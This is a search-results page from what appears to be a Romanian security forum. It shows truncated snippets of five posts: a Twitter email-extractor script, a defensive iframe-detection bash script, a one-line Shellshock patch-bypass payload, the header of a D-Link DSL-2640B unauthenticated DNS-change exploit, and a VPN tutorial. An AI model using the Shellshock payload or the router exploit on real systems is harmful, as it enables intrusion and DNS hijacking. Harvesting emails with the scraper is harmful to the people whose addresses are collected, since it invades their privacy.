Jump to content

Search the Community

Showing results for tags 'echo'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 5 results

  1. * Twitter Email extractor v.1.2 * * author: spikyy @ BlackHatWorld * thx to weaselstomp and HTTP_REFERER */ set_time_limit(1800); // 30 minutes $break = Explode('/', $_SERVER["SCRIPT_NAME"]); $pfile = $break[count($break) - 1]; if(!isset($_GET['action'])) { echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Twitter Extractor v1.5</title> </head><body bgcolor="#7DE3F9"> <center> <h1>Twitter Extractor v1.5</h1> <br /> <form action="'.$pfile.'?action=do" method="post"> <table width=
  2. #!/bin/bash # Iframe Detect Script By [sleed]/ # O_O # Usage: Copy all iframedetect.txt in a *.sh file . After, chmod +x *.sh file, example: iframedetect.sh, chmod +x iframedetexct.sh , # Execute: sh iframedetect.sh # All info's go to /var/iframedetect/alert.txt # Thank You! echo 'Iframe Detect Script' blacksite='1337trojan.org' echo '' path=/var/www/ echo $search sleep 1 mkdir /var/iframedetect directory=/var/iframedetect find $path \( -regex '.*\.js$' -o -regex '.*\.php$' -o -regex '.*\.htm$' -o -regex '.*\.png$' -o -regex '.*\.css$' \) -print0 | xargs -0 egrep -ir "$blacksite" /dev/null |
  3. Last patch bypass. rm -f echo && env -i X='() { (a)=>\' bash -c 'echo date'; cat echo Enjoy, depends on your OS maybe date could be $(date), Enjoy.
  4. #!/bin/bash # # D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit # # Copyright 2015 (c) Todor Donev <todor.donev at gmail.com> # http://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # # Description: # Different D-Link Routers are vulnerable to DNS change. # The vulnerability exist in the web interface, which is # accessible without authentication. # # Tested firmware version: EU_2.03 # ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link # DEVICES OR FIRMWARE VERSIONS MAY AFFECTED. # # Once modified, systems use foreign DNS servers, w
  5. There are many ways you can go about creating your own Virtual Private Network. Let’s do the easiest one in this tutorial which will be how to use your VPS as your own VPN for your main machines connection. – ro0ted What’s used in this tutorial? Digital Oceans Cloud Debian Server VPS Putty AIO Open Puttygen>Click Generate>move your mouse around the blank space. Then copy the public key to the clipboard, save the public/private key Go to digital ocean control panel click SSH Keys. Copy n paste the public key from Puttygen to Control Panel. Now open Putty. Now once you are
×
×
  • Create New...